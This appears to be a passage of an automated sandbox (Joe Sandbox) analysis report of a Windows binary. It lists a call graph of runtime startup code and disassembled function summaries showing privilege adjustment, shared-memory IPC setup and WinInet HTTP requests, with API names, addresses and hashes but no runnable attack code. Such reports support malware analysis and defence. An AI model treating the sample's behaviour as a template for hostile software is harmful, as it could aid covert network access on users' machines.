HeapDestroy 58790->58866 58794 111695c4 DecodePointer 58791->58794 58791->58796 58800 111695d9 58794->58800 58795 11169574 58872 1116d4ee HeapDestroy 58795->58872 58796->58757 58849 111711c9 GetStartupInfoW 58797->58849 58801 111695f4 _free 58800->58801 58802 111695dd 58800->58802 58801->58796 58874 1116b688 67 API calls 4 library calls 58802->58874 58805 11169511 __setargv 58807 1116952a 58805->58807 58808 1116951a __setenvp 58805->58808 58806 1116950a 58867 1116b64b DecodePointer TlsFree DeleteCriticalSection _free DeleteCriticalSection 58806->58867 58807->58796 58868 1117140e DeleteCriticalSection _free 58807->58868 58808->58807 58811 11169523 58808->58811 58809 111695e4 GetCurrentThreadId 58809->58796 58862 1116d5ae 58811->58862 58815 1110f7d0 58814->58815 58816 1110f7f1 58815->58816 58817 1110f7dc 58815->58817 58818 1110f804 ___DllMainCRTStartup 58815->58818 58882 1110f720 58816->58882 58817->58818 58820 1110f720 ___DllMainCRTStartup 7 API calls 58817->58820 58818->58760 58822 1110f7e5 58820->58822 58821 1110f7f8 58821->58760 58822->58760 58823->58777 58825 1116b980 58824->58825 58826 1116b989 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 58824->58826 58876 1116b64b DecodePointer TlsFree DeleteCriticalSection _free DeleteCriticalSection 58825->58876 58827 1116b9d3 TlsAlloc 58826->58827 58831 1116bae2 58827->58831 58832 1116ba21 TlsSetValue 58827->58832 58829 1116b985 58829->58785 58831->58785 58832->58831 58833 1116ba32 58832->58833 58877 1116d557 EncodePointer EncodePointer __init_pointers _raise __initp_misc_winsig 58833->58877 58835 1116ba37 EncodePointer EncodePointer EncodePointer EncodePointer 58878 111735c2 InitializeCriticalSectionAndSpinCount 58835->58878 58837 1116ba76 58838 1116badd 58837->58838 58839 1116ba7a DecodePointer 58837->58839 58880 1116b64b DecodePointer TlsFree DeleteCriticalSection _free DeleteCriticalSection 58838->58880 58841 1116ba8f 58839->58841 58841->58838 58842 11169dbe __calloc_crt 67 API calls 58841->58842 58843 1116baa5 58842->58843 58843->58838 58844 1116baad DecodePointer 58843->58844 58845 1116babe 58844->58845 58845->58838 58846 1116bac2 58845->58846 58879 1116b688 67 API calls 4 library calls 58846->58879 58848 1116baca GetCurrentThreadId 58848->58831 58850 11169dbe __calloc_crt 67 API calls 58849->58850 58857 111711e7 58850->58857 58851 11171392 GetStdHandle 58858 1117135c 58851->58858 58852 111713f6 SetHandleCount 58854 11169506 58852->58854 58853 11169dbe __calloc_crt 67 API calls 58853->58857 58854->58805 58854->58806 58855 111713a4 GetFileType 58855->58858 58856 111712dc 58856->58858 58859 11171313 InitializeCriticalSectionAndSpinCount 58856->58859 58860 11171308 GetFileType 58856->58860 58857->58853 58857->58854 58857->58856 58857->58858 58858->58851 58858->58852 58858->58855 58861 111713ca InitializeCriticalSectionAndSpinCount 58858->58861 58859->58854 58859->58856 58860->58856 58860->58859 58861->58854 58861->58858 58863 1116d5bc __IsNonwritableInCurrentImage 58862->58863 58881 1116c9cb EncodePointer 58863->58881 58865 1116d5da __initterm_e __IsNonwritableInCurrentImage 58865->58807 58866->58796 58867->58790 58868->58806 58869->58783 58870->58789 58871->58795 58872->58784 58873->58796 58874->58809 58875->58796 58876->58829 58877->58835 58878->58837 58879->58848 58880->58831 58881->58865 58883 1110f764 EnterCriticalSection 58882->58883 58884 1110f74f InitializeCriticalSection 58882->58884 58885 1110f785 58883->58885 58884->58883 58886 1110f7b3 LeaveCriticalSection 58885->58886 58887 1110f6c0 ___DllMainCRTStartup 4 API calls 58885->58887 58886->58821 58887->58885 58888 110304b8 58889 110304c6 58888->58889 58890 11030518 58889->58890 58892 11081bb0 115 API calls 58889->58892 58891 110ed1a0 2 API calls 58890->58891 58893 1103053f 58891->58893 58892->58890 58897 11030589 58893->58897 58951 110ed250 6 API calls __87except 58893->58951 58895 11030554 58952 110ed250 6 API calls __87except 58895->58952 58899 1110f420 std::locale::facet::_Facet_Register 307 API calls 58897->58899 58898 1103056b 58898->58897 58900 111463d0 19 API calls 58898->58900 58901 110305af 58899->58901 58900->58897 58930 1108a470 58901->58930 58903 110305e3 OpenMutexA 58904 11030603 CreateMutexA 58903->58904 58905 1103071a CloseHandle 58903->58905 58906 11030623 58904->58906 58907 1108a570 71 API calls 58905->58907 58908 1110f420 std::locale::facet::_Facet_Register 307 API calls 58906->58908 58910 11030730 58907->58910 58909 11030638 58908->58909 58941 11015c30 LoadLibraryA 58909->58941 58911 11161d01 __87except 5 API calls 58910->58911 58912 110310b3 58911->58912 58914 1103066d 58915 111450a0 std::locale::facet::_Facet_Register 121 API calls 58914->58915 58916 1103067c 58915->58916 58917 11030689 58916->58917 58918 1103069c 58916->58918 58942 11145ae0 58917->58942 58919 110306a6 GetProcAddress 58918->58919 58920 11030690 58918->58920 58919->58920 58922 110306c0 SetLastError 58919->58922 58923 110281a0 47 API calls 58920->58923 58922->58920 58924 110306cd 58923->58924 58953 110092f0 454 API calls std::locale::facet::_Facet_Register 58924->58953 58926 110306dc 58927 110306f0 WaitForSingleObject 58926->58927 58927->58927 58928 11030702 CloseHandle 58927->58928 58928->58905 58929 11030713 FreeLibrary 58928->58929 58929->58905 58931 1110f420 std::locale::facet::_Facet_Register 307 API calls 58930->58931 58932 1108a4a7 58931->58932 58933 1108a4c9 InitializeCriticalSection 58932->58933 58934 1110f420 std::locale::facet::_Facet_Register 307 API calls 58932->58934 58937 1108a52a 58933->58937 58936 1108a4c2 58934->58936 58936->58933 58954 1116219a 67 API calls std::exception::_Copy_str 58936->58954 58937->58903 58939 1108a4f9 58955 111625f1 RaiseException 58939->58955 58941->58914 58943 111450a0 std::locale::facet::_Facet_Register 121 API calls 58942->58943 58944 11145af2 58943->58944 58945 11145b30 58944->58945 58946 11145af9 LoadLibraryA 58944->58946 58945->58920 58947 11145b2a 58946->58947 58948 11145b0b GetProcAddress 58946->58948 58947->58920 58949 11145b23 FreeLibrary 58948->58949 58950 11145b1b 58948->58950 58949->58947 58950->58949 58951->58895 58952->58898 58953->58926 58954->58939 58955->58933

                                                                                        Executed Functions

                                                                                        Function 1109E190 Relevance: 100.3, APIs: 42, Strings: 15, Instructions: 501filethreadmemoryCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 716 1109e190-1109e1f2 call 1109d980 719 1109e1f8-1109e21b call 1109d440 716->719 720 1109e810 716->720 726 1109e221-1109e235 LocalAlloc 719->726 727 1109e384-1109e386 719->727 721 1109e812-1109e82d call 11161d01 720->721 729 1109e23b-1109e26d InitializeSecurityDescriptor SetSecurityDescriptorDacl GetVersionExA 726->729 730 1109e805-1109e80b call 1109d4d0 726->730 728 1109e316-1109e33b CreateFileMappingA 727->728 732 1109e388-1109e39b GetLastError 728->732 733 1109e33d-1109e35d GetLastError call 1112ef20 728->733 734 1109e2fa-1109e310 729->734 735 1109e273-1109e29e call 1109d3a0 call 1109d3f0 729->735 730->720 736 1109e39d 732->736 737 1109e3a2-1109e3b9 MapViewOfFile 732->737 748 1109e368-1109e370 733->748 749 1109e35f-1109e366 LocalFree 733->749 734->728 758 1109e2e9-1109e2f1 735->758 759 1109e2a0-1109e2d6 GetSecurityDescriptorSacl 735->759 736->737 740 1109e3bb-1109e3d6 call 1112ef20 737->740 741 1109e3f7-1109e3ff 737->741 761 1109e3d8-1109e3d9 LocalFree 740->761 762 1109e3db-1109e3e3 740->762 746 1109e4a1-1109e4b3 741->746 747 1109e405-1109e41e GetModuleFileNameA 741->747 752 1109e4f9-1109e512 call 11161d20 GetTickCount 746->752 753 1109e4b5-1109e4b8 746->753 754 1109e4bd-1109e4d8 call 1112ef20 747->754 755 1109e424-1109e42d 747->755 756 1109e372-1109e373 LocalFree 748->756 757 1109e375-1109e37f 748->757 749->748 779 1109e514-1109e519 752->779 763 1109e59f-1109e603 GetCurrentProcessId GetModuleFileNameA call 1109d810 753->763 777 1109e4da-1109e4db LocalFree 754->777 778 1109e4dd-1109e4e5 754->778 755->754 764 1109e433-1109e436 755->764 756->757 766 1109e7fe-1109e800 call 1109d8c0 757->766 758->734 768 1109e2f3-1109e2f4 FreeLibrary 758->768 759->758 767 1109e2d8-1109e2e3 SetSecurityDescriptorSacl 759->767 761->762 770 1109e3e8-1109e3f2 762->770 771 1109e3e5-1109e3e6 LocalFree 762->771 783 1109e60b-1109e622 CreateEventA 763->783 784 1109e605 763->784 773 1109e479-1109e49c call 1112ef20 call 1109d8c0 764->773 774 1109e438-1109e43c 764->774 766->730 767->758 768->734 770->766 771->770 773->746 774->773 782 1109e43e-1109e449 774->782 777->778 786 1109e4ea-1109e4f4 778->786 787 1109e4e7-1109e4e8 LocalFree 778->787 788 1109e51b-1109e52a 779->788 789 1109e52c 779->789 785 1109e450-1109e454 782->785 793 1109e624-1109e643 GetLastError * 2 call 1112ef20 783->793 794 1109e646-1109e64e 783->794 784->783 791 1109e470-1109e472 785->791 792 1109e456-1109e458 785->792 786->766 787->786 788->779 788->789 795 1109e52e-1109e534 789->795 800 1109e475-1109e477 791->800 797 1109e45a-1109e460 792->797 798 1109e46c-1109e46e 792->798 793->794 801 1109e650 794->801 802 1109e656-1109e667 CreateEventA 794->802 803 1109e545-1109e59d 795->803 804 1109e536-1109e543 795->804 797->791 805 1109e462-1109e46a 797->805 798->800 800->754 800->773 801->802 807 1109e669-1109e688 GetLastError * 2 call 1112ef20 802->807 808 1109e68b-1109e693 802->808 803->763 804->795 804->803 805->785 805->798 807->808 810 1109e69b-1109e6ad CreateEventA 808->810 811 1109e695 808->811 813 1109e6af-1109e6ce GetLastError * 2 call 1112ef20 810->813 814 1109e6d1-1109e6d9 810->814 811->810 813->814 815 1109e6db 814->815 816 1109e6e1-1109e6f2 CreateEventA 814->816 815->816 819 1109e714-1109e722 816->819 820 1109e6f4-1109e711 GetLastError * 2 call 1112ef20 816->820 822 1109e724-1109e725 LocalFree 819->822 823 1109e727-1109e72f 819->823 820->819 822->823 825 1109e731-1109e732 LocalFree 823->825 826 1109e734-1109e73d 823->826 825->826 827 1109e743-1109e746 826->827 828 1109e7e7-1109e7f9 call 1112ef20 826->828 827->828 830 1109e74c-1109e74f 827->830 828->766 830->828 832 1109e755-1109e758 830->832 832->828 833 1109e75e-1109e761 832->833 834 1109e76c-1109e788 CreateThread 833->834 835 1109e763-1109e769 GetCurrentThreadId 833->835 836 1109e78a-1109e794 834->836 837 1109e796-1109e7a0 834->837 835->834 836->766 838 1109e7ba-1109e7e5 SetEvent call 1112ef20 call 1109d4d0 837->838 839 1109e7a2-1109e7b8 ResetEvent * 3 837->839 838->721 839->838
                                                                                        APIs
                                                                                          • Part of subcall function 1109D440: GetCurrentProcess.KERNEL32(000F01FF,?,11030063,00000000,00000000,00080000,1B492F88,00080000,00000000,00000000), ref: 1109D46D
                                                                                          • Part of subcall function 1109D440: OpenProcessToken.ADVAPI32(00000000), ref: 1109D474
                                                                                          • Part of subcall function 1109D440: LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109D485
                                                                                          • Part of subcall function 1109D440: AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109D4A9
                                                                                        • LocalAlloc.KERNEL32(00000040,00000014,SeSecurityPrivilege,?,00080000,1B492F88,00080000,00000000,00000000), ref: 1109E225
                                                                                        • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 1109E23E
                                                                                        • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 1109E249
                                                                                        • GetVersionExA.KERNEL32(?), ref: 1109E260
                                                                                        • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109E2CE
                                                                                        • SetSecurityDescriptorSacl.ADVAPI32(00000000,00000001,?,00000000), ref: 1109E2E3
                                                                                        • FreeLibrary.KERNEL32(00000001,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109E2F4
                                                                                        • CreateFileMappingA.KERNEL32(000000FF,11030063,00000004,00000000,?,?), ref: 1109E330
                                                                                        • GetLastError.KERNEL32 ref: 1109E33D
                                                                                        • LocalFree.KERNEL32(?), ref: 1109E366
                                                                                        • LocalFree.KERNEL32(?), ref: 1109E373
                                                                                        • GetLastError.KERNEL32 ref: 1109E390
                                                                                        • MapViewOfFile.KERNEL32(?,000F001F,00000000,00000000,00000000), ref: 1109E3AE
                                                                                        • LocalFree.KERNEL32(?), ref: 1109E3D9
                                                                                        • LocalFree.KERNEL32(?), ref: 1109E3E6
                                                                                          • Part of subcall function 1109D3A0: LoadLibraryA.KERNEL32(Advapi32.dll,00000000,1109E27E), ref: 1109D3A8
                                                                                          • Part of subcall function 1109D3F0: GetProcAddress.KERNEL32(00000000,ConvertStringSecurityDescriptorToSecurityDescriptorA), ref: 1109D404
                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109E412
                                                                                        • LocalFree.KERNEL32(?), ref: 1109E4DB
                                                                                        • LocalFree.KERNEL32(?), ref: 1109E4E8
                                                                                        • _memset.LIBCMT ref: 1109E500
                                                                                        • GetTickCount.KERNEL32 ref: 1109E508
                                                                                        • GetCurrentProcessId.KERNEL32 ref: 1109E5B4
                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109E5CF
                                                                                        • CreateEventA.KERNEL32(?,00000000,00000000,?,?,?,?,?,?), ref: 1109E61B
                                                                                        • GetLastError.KERNEL32 ref: 1109E624
                                                                                        • GetLastError.KERNEL32(00000000), ref: 1109E62B
                                                                                        • CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109E660
                                                                                        • GetLastError.KERNEL32 ref: 1109E669
                                                                                        • GetLastError.KERNEL32(00000000), ref: 1109E670
                                                                                        • CreateEventA.KERNEL32(?,00000001,00000000,?), ref: 1109E6A6
                                                                                        • GetLastError.KERNEL32 ref: 1109E6AF
                                                                                        • GetLastError.KERNEL32(00000000), ref: 1109E6B6
                                                                                        • CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109E6EB
                                                                                        • GetLastError.KERNEL32 ref: 1109E6FA
                                                                                        • GetLastError.KERNEL32(00000000), ref: 1109E6FD
                                                                                        • LocalFree.KERNEL32(?), ref: 1109E725
                                                                                        • LocalFree.KERNEL32(?), ref: 1109E732
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 1109E763
                                                                                        • CreateThread.KERNEL32(00000000,00002000,Function_0009DD20,00000000,00000000,00000030), ref: 1109E77D
                                                                                        • ResetEvent.KERNEL32(?), ref: 1109E7AC
                                                                                        • ResetEvent.KERNEL32(?), ref: 1109E7B2
                                                                                        • ResetEvent.KERNEL32(?), ref: 1109E7B8
                                                                                        • SetEvent.KERNEL32(?), ref: 1109E7BE
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$FreeLocal$Event$Create$DescriptorFileSecurity$CurrentProcessReset$LibraryModuleNameSaclThreadToken$AddressAdjustAllocCountDaclInitializeLoadLookupMappingOpenPrivilegePrivilegesProcTickValueVersionView_memset
                                                                                        • String ID: Cant create event %s, e=%d (x%x)$Error cant create events$Error cant map view$Error creating filemap (%d)$Error filemap exists$IPC(%s) created$Info - reusing existing filemap$S:(ML;;NW;;;LW)$SeSecurityPrivilege$cant create events$cant create filemap$cant create thread$cant map$map exists$warning map exists
                                                                                        • API String ID: 3291243470-2792520954
                                                                                        • Opcode ID: e1e4d2c24c486b94928180782bcaf8fbecda1daffafc4b641c279d7d38800a12
                                                                                        • Instruction ID: e0f3534def007632db5cc521867dfefedb1bc63d92e862916d16df31d0e36df5
                                                                                        • Opcode Fuzzy Hash: e1e4d2c24c486b94928180782bcaf8fbecda1daffafc4b641c279d7d38800a12
                                                                                        • Instruction Fuzzy Hash: 221282B590026D9FE724DF61CCD4EAEF7BABB88308F0049A9E11997244D771AD84CF51
                                                                                        Function 11029590 Relevance: 88.0, APIs: 38, Strings: 12, Instructions: 534libraryloadernetworkCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 844 11029590-1102961e LoadLibraryA 845 11029621-11029626 844->845 846 11029628-1102962b 845->846 847 1102962d-11029630 845->847 848 11029645-1102964a 846->848 849 11029632-11029635 847->849 850 11029637-11029642 847->850 851 11029679-11029685 848->851 852 1102964c-11029651 848->852 849->848 850->848 853 1102972a-1102972d 851->853 854 1102968b-110296a3 call 11162b51 851->854 855 11029653-1102966a GetProcAddress 852->855 856 1102966c-1102966f 852->856 858 11029748-11029760 InternetOpenA 853->858 859 1102972f-11029746 GetProcAddress 853->859 865 110296c4-110296d0 854->865 866 110296a5-110296be GetProcAddress 854->866 855->856 860 11029671-11029673 SetLastError 855->860 856->851 863 11029784-11029790 _free 858->863 859->858 862 11029779-11029781 SetLastError 859->862 860->851 862->863 867 11029796-110297c7 call 11142290 call 11164390 863->867 868 11029a0a-11029a14 863->868 872 110296d2-110296db GetLastError 865->872 878 110296f1-110296f3 865->878 866->865 869 11029762-1102976a SetLastError 866->869 894 110297c9-110297cc 867->894 895 110297cf-110297e4 call 11081a70 * 2 867->895 868->845 871 11029a1a 868->871 869->872 875 11029a2c-11029a2f 871->875 872->878 879 110296dd-110296ef _free call 11162b51 872->879 876 11029a31-11029a36 875->876 877 11029a3b-11029a3e 875->877 881 11029b9f-11029ba7 876->881 882 11029a40-11029a45 877->882 883 11029a4a 877->883 885 11029710-1102971c 878->885 886 110296f5-1102970e GetProcAddress 878->886 879->878 891 11029bb0-11029bc3 881->891 892 11029ba9-11029baa FreeLibrary 881->892 888 11029b6f-11029b74 882->888 889 11029a4d-11029a55 883->889 885->853 902 1102971e-11029727 885->902 886->885 893 1102976f-11029777 SetLastError 886->893 900 11029b76-11029b8d GetProcAddress 888->900 901 11029b8f-11029b95 888->901 898 11029a57-11029a6e GetProcAddress 889->898 899 11029a74-11029a7d 889->899 892->891 893->853 894->895 914 110297e6-110297ea 895->914 915 110297ed-110297f9 895->915 898->899 904 11029b2e-11029b30 SetLastError 898->904 907 11029a80-11029a82 899->907 900->901 905 11029b97-11029b99 SetLastError 900->905 901->881 902->853 909 11029b36-11029b3d 904->909 905->881 907->909 912 11029a88-11029a8d 907->912 910 11029b4c-11029b6d call 110278a0 * 2 909->910 910->888 912->910 916 11029a93-11029acf call 1110f4a0 call 11027850 912->916 914->915 918 11029824-11029829 915->918 919 110297fb-110297fd 915->919 943 11029ae1-11029ae3 916->943 944 11029ad1-11029ad4 916->944 925 1102982b-1102983c GetProcAddress 918->925 926 1102983e-11029855 InternetConnectA 918->926 922 11029814-1102981a 919->922 923 110297ff-11029812 GetProcAddress 919->923 922->918 923->922 930 1102981c-1102981e SetLastError 923->930 925->926 932 11029881-1102988c SetLastError 925->932 927 110299f7-11029a07 call 111618c1 926->927 928 1102985b-1102985e 926->928 927->868 933 11029860-11029862 928->933 934 11029899-110298a1 928->934 930->918 932->927 938 11029864-11029877 GetProcAddress 933->938 939 11029879-1102987f 933->939 940 110298a3-110298b7 GetProcAddress 934->940 941 110298b9-110298d4 934->941 938->939 946 11029891-11029893 SetLastError 938->946 939->934 940->941 949 110298d6-110298de SetLastError 940->949 955 110298e1-110298e4 941->955 947 11029ae5 943->947 948 11029aec-11029af1 943->948 944->943 945 11029ad6-11029ada 944->945 945->943 950 11029adc 945->950 946->934 947->948 951 11029af3-11029b09 call 110d1090 948->951 952 11029b0c-11029b0e 948->952 949->955 950->943 951->952 957 11029b10-11029b12 952->957 958 11029b14-11029b25 call 111618c1 952->958 959 110299f2-110299f5 955->959 960 110298ea-110298ef 955->960 957->958 965 11029b3f-11029b49 call 111618c1 957->965 958->910 974 11029b27-11029b29 958->974 959->927 964 11029a1c-11029a29 call 111618c1 959->964 961 110298f1-11029908 GetProcAddress 960->961 962 1102990a-11029916 960->962 961->962 967 11029918-11029920 SetLastError 961->967 973 11029922-1102993b GetLastError 962->973 964->875 965->910 967->973 976 11029956-1102996b 973->976 977 1102993d-11029954 GetProcAddress 973->977 974->889 980 11029975-11029983 GetLastError 976->980 977->976 978 1102996d-1102996f SetLastError 977->978 978->980 981 11029985-1102998a 980->981 982 1102998c-11029998 GetDesktopWindow 980->982 981->982 983 110299e2-110299e7 981->983 984 110299b3-110299cf 982->984 985 1102999a-110299b1 GetProcAddress 982->985 983->959 986 110299e9-110299ef 983->986 984->959 989 110299d1 984->989 985->984 987 110299d6-110299e0 SetLastError 985->987 986->959 987->959 989->955
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(WinInet.dll,1B492F88,74DF23A0,?,00000000), ref: 110295C5
                                                                                        • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 1102965F
                                                                                        • SetLastError.KERNEL32(00000078), ref: 11029673
                                                                                        • _malloc.LIBCMT ref: 11029697
                                                                                        • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 110296B1
                                                                                        • GetLastError.KERNEL32 ref: 110296D2
                                                                                        • _free.LIBCMT ref: 110296DE
                                                                                        • _malloc.LIBCMT ref: 110296E7
                                                                                        • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 11029701
                                                                                        • GetProcAddress.KERNEL32(?,InternetOpenA), ref: 1102973B
                                                                                        • InternetOpenA.WININET(11194244,?,?,000000FF,00000000), ref: 1102975A
                                                                                        • SetLastError.KERNEL32(00000078), ref: 11029764
                                                                                        • SetLastError.KERNEL32(00000078), ref: 11029771
                                                                                        • SetLastError.KERNEL32(00000078), ref: 1102977B
                                                                                        • _free.LIBCMT ref: 11029785
                                                                                          • Part of subcall function 11162BE5: HeapFree.KERNEL32(00000000,00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162BFB
                                                                                          • Part of subcall function 11162BE5: GetLastError.KERNEL32(00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162C0D
                                                                                        • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029805
                                                                                        • SetLastError.KERNEL32(00000078), ref: 1102981E
                                                                                        • GetProcAddress.KERNEL32(?,InternetConnectA), ref: 11029831
                                                                                        • InternetConnectA.WININET(000000FF,11199690,00000050,00000000,00000000,00000003,00000000,00000000), ref: 1102984E
                                                                                        • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 1102986A
                                                                                        • SetLastError.KERNEL32(00000078), ref: 11029883
                                                                                        • GetProcAddress.KERNEL32(?,HttpOpenRequestA), ref: 110298A9
                                                                                        • GetProcAddress.KERNEL32(?,HttpSendRequestA), ref: 110298FD
                                                                                        • GetProcAddress.KERNEL32(?,InternetQueryDataAvailable), ref: 11029A63
                                                                                        • SetLastError.KERNEL32(00000078), ref: 11029B30
                                                                                        • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029B82
                                                                                        • SetLastError.KERNEL32(00000078), ref: 11029B99
                                                                                        • FreeLibrary.KERNEL32(?), ref: 11029BAA
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressProc$ErrorLast$FreeInternetLibrary_free_malloc$ConnectHeapLoadOpen
                                                                                        • String ID: ://$GET$HttpOpenRequestA$HttpQueryInfoA$HttpSendRequestA$InternetCloseHandle$InternetConnectA$InternetErrorDlg$InternetOpenA$InternetQueryDataAvailable$InternetQueryOptionA$WinInet.dll
                                                                                        • API String ID: 921868004-913974648
                                                                                        • Opcode ID: 2d2eeaad931a34bca1b43c66b17deac4db3cf30db8dfadc355f34a03c0ad81b1
                                                                                        • Instruction ID: e81a0880bf89439be6f70403065d0babe3f5b16467f55efefddb7e1ac6149969
                                                                                        • Opcode Fuzzy Hash: 2d2eeaad931a34bca1b43c66b17deac4db3cf30db8dfadc355f34a03c0ad81b1
                                                                                        • Instruction Fuzzy Hash: 5E127FB0D04269EBEB11CFA9CC88A9EFBF9FF88754F604569E465E7240E7705940CB60
                                                                                        Function 11061C90 Relevance: 76.5, APIs: 22, Strings: 21, Instructions: 1221COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 11144EA0: GetLastError.KERNEL32(?,02B4B870,000000FF,?), ref: 11144ED5
                                                                                          • Part of subcall function 11144EA0: Sleep.KERNEL32(000000C8,?,?,?,?,?,?,02B4B870,000000FF,?), ref: 11144EE5
                                                                                        • _fgets.LIBCMT ref: 11061DC2
                                                                                        • _strpbrk.LIBCMT ref: 11061E29
                                                                                        • _fgets.LIBCMT ref: 11061F2C
                                                                                        • _strpbrk.LIBCMT ref: 11061FA3
                                                                                        • __wcstoui64.LIBCMT ref: 11061FBC
                                                                                        • _fgets.LIBCMT ref: 11062035
                                                                                        • _strpbrk.LIBCMT ref: 1106205B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
